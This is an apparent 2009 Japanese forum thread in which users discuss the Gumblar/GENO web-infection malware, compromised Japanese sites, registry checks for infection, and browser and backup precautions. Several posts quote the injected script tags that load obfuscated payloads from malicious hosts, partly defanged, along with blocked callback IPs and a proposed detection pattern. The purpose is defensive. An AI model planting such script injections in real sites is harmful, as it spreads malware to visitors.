実際にカスペルスキーで見つかって駆除した人いないかな？

>>642
NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず
それで大丈夫だったのかも
まあ心配ならリカバリが一番安全安心確実

ちと疑問
新型GENOは、感染してからファイルやデータを
バックアップしても平気というか間に合うのか？

GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし
リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい？

>>583
おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない
もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった？

>>646
不活性化されたまんまHDDに残るを詳しく頼む

そのまんまだよ
動かないけどファイルは残ってるってこと

バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、
もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ

でもレジストリまでそのままリストアしたらアウトってこと
レジストリ内にGENOを起動させる設定があるからね
きちんと修正したレジストリならば戻しても大丈夫じゃないかな

レジストリをいじるプログラムなんかをその感染後にバックアップした中から
また入れなおすときには要注意ってことかなるほど

レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。
画像ファイルやテキストワードファイルや音楽ファイルなんかは
それ自体はレジストリいじるのはあまりないだろうし、
それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。
詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。

ほんとにわかってるのかすごく心配になる文章だな
つーか何を言いたいのか1回読んだだけじゃまったく理解できん

とりあえず1行目のは実行ファイルっていえばいいんじゃね

実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな
やっと解読できた

Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に
埋め込まれることが多いからちょっと違う場所なんだけどね
まあレジストリは下手にいじると本当に危ないんで注意してください

//404の中身が変わって、有害化してるらしい。
中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。

>>656 のとおり、
一時期無害化されていたGumblar.xが攻撃再開。ご注意を。

こんなの貼られてた
Hは半角小文字、前後のスペースなし
●は.で

</head>

<script src=　H　ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>

Google Chormeでのweb巡回でもGENO対策になりますか・・・

横レススマソ

いいえ
どこが横レスなのかわからん

Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど
新型感染サイトはブロックされない可能性がある

まずは各種ソフトウェアの更新をしっかりやってください

ソフトウェアの更新については>>359あたり参照
今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新

Javaランタイムのバージョン確認方法は

>>662
サイトくらい見ればいいのに
http://www.java.com/ja/download/installed.jsp

あと設定→コントロールパネル→Java→
基本タブにあるバージョン情報ボタンクリック

バージョンすら確認出来ないのにネットやってて大丈夫なのかよｗ

あったりまえじゃん！　ぜーんぜんへーきさ

立命館大学の学園祭HPが感染したってマジか？

>>666
貴方↓の中の人ですか？
ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/
Gumblar.xですか。
ソースチェカー
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua=
Googleから行くと弾かれますね。

立命館大学衣笠学園祭事務局　問い合わせ
ttp://www.rits-fes.net/mail/index.html
TEL/FAX：075-465-7891
↑
電話で教えて差し上げましたが対応が最悪です。
挙句の果てに電話を切られました。もうね、アホかとw

うほｗｗｗｗｗがっつり感染しとるｗｗｗ

>>667
今行くと404が出るからやっと対応したのかな？
でも今日の時点でアクセスカウンターが3万行ってたんだから
きちんと経緯とかを説明して欲しいね

中の人ならいまさらマジかっていわないだろｗｗｗ

【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 （09/11/09）
http://pc11.2ch.net/test/read.cgi/pcnews/1257767416/

>>671
難しくてわからない
3行にまとめて下さい

ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
立命館大学BKC学園祭事務局 TEL:077-561-3990
↑
に電話をしたところ、話の途中でＦＡＸ回線に切り替えられましたw
ピーピロピロピーってorz

[PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題
ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf
カタカナ英語使えばいいってもんじゃないっしょｗｗ

関西の大学に常識的な対応を期待するなよ

majormess.nlってのもGENOの亜種ですか？
またクロームで警告あったんですが・・

今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも？

そこからさらに亜種も派生してさらに蔓延すると
今回はLoveLetter以来のかなり悪質なものだね

巻き込み規制喰らってるので携帯からorz

ｈttp://www●interq●or●jp/
Redirectにコードが仕込んであるっぽい
--
＜meta http-equiv="refresh" CONTENT="0;URL=ｈttp://members●interq●or●jp/"＞
＜/head＞
＜script src=ｈttp://ykcv●org/upload_data/blogslideconf/hvkh●php ＞＜/script＞＜body＞
--
ｈttp://ykcv●org/upload_data/blogslideconf/hvkh●php
↓
ｈttp://forgottenchild●in/fieldtrips/shareyourlove●php

業種的にやばすぎるというか
終わってるだろ･･･

>>678
今ソース見てきたけど、直ってね？

>>678

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html

404も改ざんされてたらしいけど、今はどうなんだろ？

ありゃ、>>678のソースが復活してら。駄目だねこりゃ。

Welcome to Oriental Tunes

Dear Visitor

You have requested a page or file that does not exist on the site you came from.
You can proceed to Oriental Tunes and look for that file on our site.

ISPのシス管感染ﾜﾛｽ
自社オプションサービスのウィルスチェックしてみればいいのにね

さすがは悪名高いinterQ・・・

修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正･･･
無限ループすんなよwww

interQ＼(＾o＾)／ｵﾜﾀ

無限ループしてる＝シス管がGumblarの対処法を知らない

いくら何でも致命的すぎないか……？

セーフ ブラウジング
interq.or.jp の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja
不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。

AS7506 (INTERQ).
http://www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja

※コメントは省略す(苦笑

interqなんてDQNしか使わないよ
よって影響なし

DQNが使うからよけいやばくね？

見る方はどうなるｗ

告知しないで放置してるやつ、HP消して逃げるやつは
罰せられるべきでは無いだろうか？　尻叩き1万発とかw

[お知らせ]
2009年05月21日（木）
【重要】Web閲覧によるウイルス感染について
ttp://support.gmo.jp/members/topics/20090521.php

5月に「感染予防策」まで書いてるのに、テメェらのPCが感染って
どんだけバカなんだよwwwwwww

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん ...
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html

>>687
http://www.google.com/safebrowsing/diagnostic?site=http://www.google.com&hl=ja
有害な不正ソフトの感染を広げる媒介をしていたかどうか
過去 90 日に、www.google.com は bia2samapc.ir/, debsh2.mihanblog.com/ を含む 2 サイトの感染媒体として機能していたようです。

interQかｗ
Q2とかなんとかダイアルみたいなのが全盛の頃を思い出すわ

>>694
http://www.google.com/safebrowsing/diagnostic?site=http://maps.google.com&hl=ja
不正なソフトウェアは mycomputer-scannervv.com/, spywarepc.info/, boy-meets-world.com/ を含む 3 個のドメインでホストされています。
spywarepc.info/, boy-meets-world.com/, tawatchai.com/ を含む 3 個のドメインが、
このサイトの訪問者に不正なソフトウェアを配布する媒体として機能しているようです。

Googleさん何やってるんですか〜

GMOに凸完了

test

interQのリダイレクトページ、こっそり撤去したなｗ

[続報] Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578791
10 月 14 日にこのマルウェアを検知してから、
11 月 16 日現在まででカスペルスキーでは既に国内の 1250 以上の感染サイトを確認しており、
先月 22 日当該脅威の発表時点より 20 倍以上の感染となっています。
動画サイトやゴルフ関連サイト、神社や空港に至るさまざまな日本のサイトにおいて感染が確認されており、
十分な警戒が必要です。現在、大手 ISP や管理機関と共に、
感染サイトのテイクダウン（閉鎖）に関する連携を行っています。
従来のガンブラーと比較して、調査を阻害するような機能が強化されていることが確認されています。
このため、現時点ではほとんどのウィルス対策ソフトが対応できていない状態であり、十分な注意が必要です。

>神社や空港

おっかねーなあ。おちおちネサフも出来やしねえ
っていうか、動画サイトってどこが引っかかってるんだ？つべクラスではさすがに無いだろうから中韓とかのやつ？

「Gumblar」酷似ウイルス被害拡大、国内1250サイト以上改ざん

Kaspersky Labs Japanは16日、
今年の春に猛威を振るった「Gumblar（ガンブラー）」に酷似したマルウェア
「Trojan-Downloader.JS.Gumblar.x」による被害が拡大しているとして注意喚起した。
16日までに国内で1250以上のサイトが改ざんされ、マルウェアを仕込まれているという。

http://internet.watch.impress.co.jp/docs/news/20091117_329507.html

感染サイト一覧を公開しろよ
やくにたたねー情報だけ出しやがって

そんなん出したら名誉毀損や営業妨害になりますし

なして？

名誉ではない
虚偽の情報ではない

＞名誉毀損や営業妨害になりますし
それは極端かもしれんけど
余計なことすると逆にカスペルが企業側から訴えられたりするだろうからな
冷静な判断かもしれん

じゃここで伏字して晒そうや

大企業や有名どころなら伏せる必要もないんじゃねえの
小林製薬やＧＥＮＯ（笑）だって散々書かれてたぞ

個人が書くのと企業が書くのとではいろいろとな…。

>>709
つい最近の居酒屋チェーン同士のケンカですねわかります

interDQNの方が相応しいよなw

>>700
絶対に安全なサイトなんてないだろうがつべは困るな。実家の母親が最近はまってるらしくてな・・・

過去に動画サイトでこのウイルスが感染したことあったっけ？

知らないけど原理的にはサイトの内容は関係ないのでないとはいえないと思う

動画サイトの感染あったよね。
サイト自体はちゃんと感染公表して対応もしたから今は大丈夫でしょう。

前にSayMoveがやられてたね

ニコ動も感染してなかった？

2chもやられたもより
janeの緊急うｐだてで対応済の件w
3月の話w

ヽ(`Д´)ﾉﾎﾞｯｷｱｹﾞ

janeもアップデートしておいたほうがよさそうだな。

俺もいい加減かちゅーしゃから別の専ブラに変えないと…

Jane Styleの対応バージョンは
3.1.1.0 かと思われ
Jane Style 公式サイトには
なぜか無いw

>>718
初耳

はっきり言って、定かじゃない
ただ、特定のスレを読み込み
リダイレクトされた気配

janeには、無関係なdatを読み込む脆弱性があったとか
修正されたとか

なにそれこわい

BIG-serverの障害情報に載ってたね。>>718
運用情報板でFTP禁止になった。（特にFFFTP）
私もSCPにしろって言われて変えた。

2chがサーバを借りているところのサーバはやられたけど
2chのサーバは無事だった

また、修正されたJaneの脆弱性はここで扱っているマルウェアとは無関係

サイト管理側は再発とかたまったものじゃないだろうな
閲覧する側はupdateの類を怠っていなければほぼ安全だが

再発は管理する側が使用するPCでのセキュリティ・updateの類を怠っているからだが・・

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2071
>攻撃再開後の今月12日には、GMOインターネット（本社：東京都渋谷区）の
インターネット・サービス・プロバイダ「InterQ」のメンバーサイトが改ざん

interQ(DQN)は「告知(お詫び)」しないのか？

CycleWorldも「告知(お詫び)」してないな。

会員制のページで感染とか無茶苦茶だな。InterQ。

所詮は悪徳業者

下手に告知すると今まで知らなかった人まで騒ぎ出し不利益になる
とかおもってんじゃね
もしくはユーザーなめられてる

注意喚起】Gumblarおよびその亜種に関する大量の感染事例について
http://www.lac.co.jp/info/alert/alert20091119.html

.>感染した際にアクセスする送信先のIPアドレス：
216.45.48.66/32
195.24.76.250/32
67.215.246.34/32
67.215.238.194/32

とりあえずこのIPへのアクセス遮断しとけば
万が一感染しても情報は抜かれないってこと？

botnetみたいになっちゃってるから今後いくらでも新しい接続先が出てくるだろうな
いちいちブロックしてもあまり効果はないよ

>>736
やっぱそうか、トン

ていうかCycleWorld、ブログに付いたコメ消してない？
告知しろみたいなコメが付いてたと思ったんだが…
最悪だな

全てGENOのせいだ
GENO写真は死んで詫びろ！賠償金払え！

国民のための情報セキュリティサイト by 総務省

http://www.soumu.go.jp/main_sosiki/joho_tsusin/security/index.htm

久々に見たらもう放置状態？

　世の中が騒がしくなってセキュリティ意識どころでは
　なくなって行った、ということでしょうかね・・・

友愛に替わったせいじゃね？

民主によって予算削減されたので更新しません

皆様に質問です。
素人考えですがサイト改竄対策としてftpaccessの設置がいいんじゃないかと思うのですが、
これについて触れているサイト(情報)がないのは有効じゃないから？

パソコンなんてオタクが使うものだし
そんなところに割く予算なんて無いんだよ

916 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/11/21(土) 22:21:42
既出かもしれんが、人に勧められて(ｗ GENO系らしき最新のやつを踏んできたので

http://www.virustotal.com/jp/analisis/4677063dadae787b33ece98828104b8bf678aca4f9255cc99135496b56e1c621-1258812050
http://www.virustotal.com/jp/analisis/1a6b609dadcd3a201d67c2aede4a6dcd44784c7d327a5f2a1836b45c5cb92d64-1258812238
http://www.virustotal.com/jp/analisis/f39716be8b4689c854fbf2440e66d2d6410c7c6209fb2557bdbf2360f6f3a541-1258812446
http://www.virustotal.com/jp/analisis/55346c2472f7382e2304756292df34bc380e2f9c0002a1b044c7df5ec342b68d-1258812661
http://www.virustotal.com/jp/analisis/619870c30813078366264da9d548ad581bef562a3cd644f227e535ecf7ddb1cb-1258812866
http://www.virustotal.com/jp/analisis/1458bacb68e8ee774555832b516ba60cc3b5b7d54ebe9c88f016049e6a0988aa-1258813053
http://www.virustotal.com/jp/analisis/7fffb5a435b632aa0ef32a19e52baa3e27999793d2740a1c3535622f4dccd1f5-1258699671
http://www.virustotal.com/jp/analisis/7039d14d18b395d8a8d3c23a29bc08158aa7924ff964e859e95d566d6fc6b67d-1258810027
http://www.virustotal.com/jp/analisis/dbb59dd5686bf3e9528ff5037ac251ff099ae4881f31177a31c7cf51d69a96f0-1258811384
http://www.virustotal.com/jp/analisis/99e159834887ba4159cd8ec2d142d4b885ba24345fa085b7bd59d93bab6092cd-1258813628

人柱が出るまでURLはスルーします

virustotalまで疑ってるのかよ

都合が悪い結果が出てるんだろうなｗ

また何でもかんでもGENO厨が現れたな

>>746
VirusTotalくらい知っといて損はないよ

>>746

ウイルス対策ソフトを入れていない人だな。

セーフ ブラウジング - ivyfancl.com の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=ivyfancl.com/&hl=ja

ざまぁｗ
と言っていいのかな、これ

>>752で気になってちょっと調べてみたさくらの結果

セーフ ブラウジング - sakura.ne.jp の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp/&hl=ja

あと、gumblar.cnってほんとに復活してるんだね
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja

いや、gumblar.cn自体はもう死んでる。
Gumblar "A" Record Down
ttp://blog.scansafe.com/journal/2009/11/6/gumblar-a-record-down.html
半年前と違ってウイルス散布サーバも乗っ取られたサーバ群だから
IPやホストではブロックしようがないわけで。

腹痛てぇwww

1. 在宅、副業
tp://ivyfancl.com/japan.html
2. メールスナイパー
tp://ivyfancl.com/mail/style.html
3. 在宅ワーク、副業、稼ぐ
tp://ivyfancl.com/style.html
4. 在宅、副業、稼ぐ
tp://ivyfancl.com/
5. 在宅、ワーク
tp://ivyfancl.com/law.html
6. 副業、稼ぐ
tp://ivyfancl.com/sublime.html
7. 在宅ワーク、初心者
tp://ivyfancl.com/webdo.html
8. 在宅、副業、サイドビジネス
tp://ivyfancl.com/order.html
9. 在宅、サイドビジネス
tp://ivyfancl.com/point.html

10. メールスナイパー
tp://ivyfancl.com/mail/law.html
11. メールスナイパー
tp://ivyfancl.com/mail/point.html
12. メールスナイパー
tp://ivyfancl.com/mail/webdo.html
13. メールスナイパー
tp://ivyfancl.com/mail/sublime.html
14. メールスナイパー
tp://ivyfancl.com/mail/index.html
15. メールスナイパー
tp://ivyfancl.com/mail/order.html
16. メールスナイパー
tp://ivyfancl.com/mail/law2.html
17. メールスナイパー
tp://ivyfancl.com/mail/japan.html

ろりぽっぷ･･･

>>755
そうなのか、勘違いごめん
じゃあこの
>不正なソフトウェアをホストしていたかどうか
>はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。
>○○を含む 5475 個のドメインを感染させています。

ってどういう意味？
言葉の通りgumblar.cnがウイルスに感染させたサイトの数だと思ってたんだけど
あと日本語で頼む

firefoxのアドオンのdr.webのリンクチェッカーなんかは対策として有効かな？

>>759
Virustotalに投げたときの検知状況はよくないようだからスルーしそう

少し前のスクリプト
ttp://www.virustotal.com/jp/analisis/1cac6b73236eede62508d4594e24e81e07e88f594f8cee7f7a8e0e176aa56af9-1259051650
最近のスクリプト
ttp://www.virustotal.com/jp/analisis/9dba2b4f27fb7b39693ba31e2ccfa5b4a3989787a9390d97522fcfb49da450be-1259051542

それより各種アップデートをしっかりやったほうがいいと思う

>>759
「引っ掛かったらラッキー」という程度の代物であり、
使う毎にping撃ってくるのが気に食わないから
うんこ(非推奨)とす。

異議は認めない。

>>759
Secunia PSI とかでパッチの適用が万全か調べる方がGENO対策としては有効。

>>759
http://pc11.2ch.net/test/read.cgi/sec/1202337108/

>>758
Googleの判定なんて知ったこっちゃないっつーかGoogleに聞いてくれって話だが、
そもそも90日前っつったら大昔じゃん。gumlar.cnやmartuz.cnを使わずに
陥落サイト群を使ってばらまき始めた先月からだよ。今は両ドメインともDNSから消えてる。
Aレコードって何? とか聞かれても困るんで知りたきゃDNSについてググって勉強してくれ。

>>759
Dr.WEBはスクリプトは苦手なんだよね。
似たようなのでMcAfeeのSiteAdvisorってのもある。

>>764
ごめん、そうする
こんな低レベルな質問に答えてくれてありがとう

人のサイト見にいったら何故か表示が遅いので（関係ないかもしれないが）、
ソースをみたら、<body>の直前にこんなのが埋め込まれていた。
<script src=http://ejame.ir/images/default00000000.● ></script>
拡張子はphp

自分、セキュリティ0だから、サイトに対してエラーはでないんだけど、黒かな

情弱な質問なんだが、Wikiに書いてある感染確認方法って、
今暴れてる亜種には意味無し？
あと、avast入れてるけど、こいつは検出してくれる？

黒だと思うよ

>>768
ありがとう。管理人さんに問い合わせてみるよ。
後、自分もカスペＤＬしてチェックしてくる・・・｜カスペ｜　　　λ....

>>767
亜種には意味無し
分かっている確認方法としてレジストリの
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の中にmidi9のエントリがあったら感染済(XP)

↓こちらが詳しい
ttp://xx2zz.blog77.fc2.com/blog-entry-131.html

avast!は最近のスクリプトは検知しない
ttp://www.virustotal.com/jp/analisis/9dba2b4f27fb7b39693ba31e2ccfa5b4a3989787a9390d97522fcfb49da450be-1259051542
またウイルス本体にもすべてには対応していない
が、比較的検出はいいほうだと思う

今回一番対応のよさそうなカスペエンジンでスキャンするのが安全か
↓カスペエンジンのオンラインスキャン

@niftyウイルスチェックサービス
ttp://www.nifty.com/security/vcheck/index.htm

>>764
ブロック調査した人が居た。
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=Gumblar%A4%CE%A5%D6%A5%ED%A5%C3%A5%AF%BE%F5%B6%B7%A4%CE%CE%E3
↑
を見る限り、Firefox+NoScriptが最も有効な対策と言えるかもしれん。

というか、アンチウイルス各社は
/*＜/head＞＜script src=http//:*.php ＞＜/script＞＜BODY*/
↑これを「黒判定」にすべき。

>>766だけど、カスペインストしてサイトチェックしたら、「トロイの木馬だぜ」って結果だった。
ＧＥＮＯウィルスチェッカーに通したけど、危険度0%なんだよね。
亜種については、ＧＥＮＯウィルスチェッカーを信用しない方がいいかな

ＧＥＮＯウィルスチェッカーなんて過去のもの

>>771
FirefoxはNoScript入れる
Google Chromeは -disable-javascriptで起動
IEは面倒だから使うな

糞チェッカーは死んだ

>>770
そこのレジストリにauxが無いのだがこれは大丈夫なのかな？

>>776
無いのなら問題ないんじゃ？　うちにも無いし
一覧見て意味をなさないような名前のドライバが
登録されてたら危ないだろうけど

とはいえコロコロ内容を変えるウイルスだから
これなら安全と言い切れないのがGumblarの怖いところ

>>777
ありがとう
無知な自分は意味をなさないドライバがどれなのかさえ分からない
本当怖いなぁ

>>770
その詳しいと書かれてるブログに、regedit.exeから確認しようとすると
midi9のエントリを一時的に削除する隠蔽動作について説明されてるんだが
regedit.exeで確認できないならどこから確認すればいい？

>>779
http://www3.atword.jp/gnome/
サイドメニューの「Zlkon, Gumblar 問題に関して」を参考に汁

>>780
先に言われてしまったが・・・

>>779
とりあえずregedit.exe以外なら不正なdllの注入を行わないはずなので
↓他のレジストリエディタを使う(Win2k以降。Windows7で動くかは不明）
　お約束だが自己責任で

激動たる俺RegEdit改
ttp://textexpage.s154.xrea.com/software/gekiorekai/
RegPro(要Microsoft .NET Framework 2.0)
ttp://www.vector.co.jp/soft/winnt/util/se464478.html

↓対処するならに確かにこちらか
http://www3.atword.jp/gnome/zlkon-gumblar-問題に関して/
まあこれは100点満点の対策だと思うから
普通は各種セキュリティ・アップデートすれば怖くない・・・はず

>>778
説明が中途半端だったと思うので念のため上記のレジストリエディタで確認してみて？

>>781
どうもありがとう、確認してみます
一応アップデート類は全部してあるのだけど心配で

>>758
日本語って？

今回の場合感染するとなる症状とかないのかな？

>>784
XPで最悪な症状が >>420 の「黒い画面にマウスカーソル」でセーフモードでも起動しない

>>785
ありがとう、そうなったら感染確実なんですね
もっとわかりやすい確認方法があればいいのになぁ
怖くてネットサーフ出来ないorz

>>786
その症状だってWindows Updateをきちんとしていればふさがれていた穴を付かれたものだよ。
将来はともかく、今のところ付かれてるのは既知の穴だけなんで必要以上に恐れることはない。

万一のためにバックアップをとっておけば何も恐れることはないだろうに

XP機のほうをたまに再起動した時にたまたまHDDの読み込みが遅くて
「黒い画面にマウスカーソル」になったままで心臓に悪い

もちろん難なく起動するけど

>>787-788
ありがとう、気にしすぎですねorz

>>790
気にしすぎも良くないけど
セキュリティソフト任せで安心しきるのも問題
常にセキュリティ意識を忘れなければいい

>>790
まあ、安全なブラウジングを目指すのも悪くない
FirefoxにNoscriptアドオンとかプライベートブラウジングあたりが定番か

>>791-792
以前流行った時このスレを見てFirefoxとNoscript入れました
親切にありがとう、神経質になりすぎないで気をつけます

画面が真っ暗、マウスしか表示されない状態になり、knoppixで
レジストリの復元をしましたが、起動しませんでした。
WinPEイメージでレジストリ値のmidi9を削除してみようと思うのですが、
起動する見込みはありますか。レジストリについて詳しくないので、
教えていただけるとありがたいです。

>>793
わけがわからないまま神経質になっても何の意味もない
ソフトウェアの更新をすれば今のところ問題ありません
そういう対策をきちんと行ってください
Firefox+NoScriptは理解できない人は使わないほうがいい

>>794
自分で調べられない程度ならやめたほうがいい

>>792
プライベートブラウジング＝サンドボックスじゃないから
マルウェアの類には意味茄子でごわす。

>>794
knoppixが使えるなら、必要なファイルだけサルベージして
クリーンインストールを推奨する。

>>795
ソフトウェアは更新してます
もう少しちゃんと調べてみますね。本当ありがとう
神経質すぎるのも駄目ですねorz

>>786
【仮想化】Returnil Virtual System【仮想化】
http://pc11.2ch.net/test/read.cgi/sec/1202337108/

【使い方】
ttp://www.hippo.flnet.org/AtTheSpring/UsingReturnil.html

・RVS_2008_free.exe
ttp://www.filecluster.com/downloads/Returnil-Virtual-System-Personal-Edition.html
※External Mirror 1から

3.0系はこっち
ttp://www.majorgeeks.com/Returnil_Virtual_System_Personal_Edition_d5702.html

>>799
うわ、本当にありがとうございます
スレ見てみますね

>>792
Noscriptなんか使うよりもSandboxieでブラウザをサンドボックス化する方がいいよ。

弱弱権限のユーザーを作って、そのユーザー権限でブラウザを実行するほうがいい

>>796
もう少し調べて分からければやめようと思います。
>>797
やはりクリーンインストールが確実かつ安全ですよね。

>>759
あるスクリプトはそれ自体がDr.WEBリンクチェッカーを蹴ってるぽい…
飛び先のチェックやDan'sViewSourceも蹴って、ソースチェッカーオンラインじゃないとソースがでなかったりするし。。。

>>799
CTMがある今ではそんなのゴミなだけ。

>>801
Sandboxieは感染後の対策、Noscriptは感染前の対策。
役割が違うものを同列に扱うなよ。

>>797
セーフブラウジング機能のつもりだったorz

>>801
個人的には有料ユーザーで導入済
ただ動作を理解していないとかえって危ないと思うので
人には勧めにくいかと

一般に勧めるのは
>>802 の制限ユーザーにするのがよさそうだな
ぐぐればアカウントの作り方くらいはすぐだし
権限がないとウイルスも大したことは出来ないから
ドライバに登録するGumblarには非常に有効だと思う
なにより普段と使い勝手が変わらないのがいい

いや、Windowsに関しては制限ユーザーで使うのが一番難しいだろ。
インストールや設定変更、正常な動作にに管理者権限を必要とするアプリが多すぎるもの。

>>781
自己レス
>とりあえずregedit.exe以外なら不正なdllの注入を行わないはずなので
どうやら違う模様
regedit.exeのみならずほとんど全てのプログラムに挿入されるので
他のレジストリエディタでも隠蔽されるとのこと
どうしたら確認できるんだろう？
セーフモードでもだめなのかね

ttp://xx2zz.blog77.fc2.com/blog-entry-131.html
>追記(11/25): レジストリキー・エントリの隠蔽はregedit.exeに限った挙動ではありません
>2chの某スレやUnderForge of Lack ≫ Zlkon, Gumblar 問題に関してにてこの記事が紹介さ
>れていましたが、レジストリキー・エントリの隠蔽が行われるのはregedit.exeだけだと誤解を与
>えてしまったようです。
>たしかに上記説明ではそう読み取れます。説明不足により誤解を与えてしまい申し訳ありませ
>ん。
>また、これらの情報は、私が取得できたGumblarの不正DLLの解析結果に基づいて書いている
>ので、他の不正DLL、または今後の亜種でも同じであるとは限りません。

説明補足はリンク先へ

>>807
だからブラウジングの時だけ制限ユーザーにすればいいと思う

うーん、AVG提供のオンラインスキャンでも駄目かな？
ttp://linkscanner.explabs.com/linkscanner/default.aspx

ウイルス感染をプロキシで防ぐ
ttp://itpro.nikkeibp.co.jp/article/Watcher/20091124/340899/

「Gumblarと，その亜種や模倣ウイルスのケースでは，
企業ネットワークのプロキシでcnドメインとlvドメインへの
アクセスを制限していれば，感染を防止できた可能性が高いのだ。」

って本当かよ？

ごめんなさい、嘘です

>防止できた可能性が高い
可能性って言葉は便利

>>811 ひどい記事だな…。

>>811
10月中頃からの新型の亜種には何の役にも立たないよねえ

>>770 の最近のスクリプトだがavast!が検出するようになった
ttp://www.virustotal.com/jp/analisis/9dba2b4f27fb7b39693ba31e2ccfa5b4a3989787a9390d97522fcfb49da450be-1259224344

と思ったらさっき採ってきたスクリプトはスルーか・・・
しかしカスペはスクリプトを見逃さないな

結果: 2/41
Kaspersky　7.0.0.125 2009.11.26 Trojan-Downloader.JS.Gumblar.x
VirusBuster　5.0.21.0 2009.11.25 JS.Crypt.DMX　←トレンドマイクロにあらず
ttp://www.virustotal.com/jp/analisis/513c24e487f4b631a2f1ab2bf348dcb75333c6b956478b96afcb210d1554f09c-1259226008

>>805
CTMは仮想化ツールじゃないだろ。

ここは、Gumblarに関する話題
・陥落サイトの報告、確認
・感染を防ぐ、確認方法の話
・＼(＾o＾)／ｵﾜﾀ人のサルベージ
などを行うスレのはずだ。

専門的な話は砂箱スレでやってくれ。
↓
【総合】ｻﾝﾄﾞﾎﾞｯｸｽ　砂箱　sandbox
http://pc11.2ch.net/test/read.cgi/sec/1202282636/

>>808
reg関連がダメなら、Double Driverとか使って追っかけられないのかな？
ttp://all-freesoft.net/hard3/driver/doubledriver/doubledriver.html

GMERはどうだ？

>>819
実験してみないとなんともいえないが、起動時に読み込ませるためだけに登録するわけだから
正規の手順で登録したドライバのようにはリストアップされない気がする

あさはかかもだけど
EWFとか使い道ないかな
http://msdn.microsoft.com/ja-jp/library/bb521577%28WinEmbedded.51%29.aspx

なんかでてるね。サイト開いても感染とか

nyで新ウィルス、割れ厨のデスクトップが自動でアップローダに投稿される
http://tsushima.2ch.net/test/read.cgi/news/1259241896/

>>823
ttp://www.virustotal.com/jp/analisis/ee5982b95d9aa6b5bc965b6278498ddcbc661609ca99f52870b7bf9ae647ec8e-1259252153
オールスルーだが、割れ厨じゃないやつには関係無いハナシ

偽物って気づけよ

昔からある山田ウィルスってやつでしょ
違いはsetup.exeが偽装されている事
P2Pやっていて落としたexeを実行しない限りは問題ないはず

ところで、GENOにはHijackThisなどのソフトは無意味なのかな？

WinPEでmidi9を削除したところ、正常に起動しましたが、
推奨されているクリーンインストールを行おうと思います。
アドバイスくださった方々ありがとうございました。

レジストリ値のエントリで感染してるかどうかの判断で重要なのは、
midi９であって、midiというエントリは関係ないのでしょうか？

うちはvistaだけど、midi/midi1/auxがある
ちなみにサウンドカードは挿してる

>>827
復旧おめ
まあ再インストールが無難だな
Gumblarには何をされてるか分からんから・・・
あとOS再インストール後にパスワード類を変更することを薦める

ただのmidiはオーディオデバイス関連とかそういうのみたいですね
全然ここら辺のこと分かってないから駄目なんだろうな。

何度も言われてるように感染してるかどうかだけでも
判断できる何かがあればいいのにと思ってましたが、
今のところは私のような素人には、>>770さんの情報が
感染してるか確認するには良い方法みたいですね。ほんと感謝です。
>>827さん頑張れ。

あるサイト行くと（まあアダルトだがｗ）、俺のカスペが、
遮断しました: Trojan-Downloader.JS.Gumblar.x　・・・　●ttp://taemkft.extra.hu/sitebuilder/24.php
なんて言ってくるんで、
gred, Norton Safe web, aguse,と試したが、どこもセーフと言ってくる。
●●phpのほう入れて試してもセーフ。だが直で行くと遮断くらう！
aguseなんて、同じカスペでスキャンしてるはずなのに…

結局、このサイトは安全なの？
おかしいのは俺？カスペ？もちろん定義ファイルは最新なんだが…

レスあまり見ないで書いてしまったら、上記の方法でも
midi9を一時的に削除して〜とかになってしまってるという話になってるんですね。
結局、XPだと起動しないとか、最悪な状態にならないと感染してるか分からないままとかなのかな・・・。
手口が巧妙で嫌だな。連投すみません。

>>832
ソースチェッカーで見てみたらどうなる？

>>832
「黒」
命拾いしたな。

